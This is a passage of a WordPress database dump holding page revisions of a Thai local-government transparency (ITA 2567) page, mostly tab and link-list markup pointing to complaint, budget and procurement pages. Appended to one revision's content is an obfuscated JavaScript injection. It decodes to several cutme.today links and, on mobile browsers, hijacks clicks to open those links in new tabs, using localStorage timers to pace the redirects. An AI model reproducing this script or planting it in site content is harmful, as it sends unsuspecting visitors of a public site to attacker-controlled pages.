/wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-20 08:49:04','2024-08-20 01:49:04','',871,'http://pakhaeng.ssk.in.th/?p=887',0,'revision','',0),
(889,1,'2024-08-20 08:54:33','2024-08-20 01:54:33','<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" 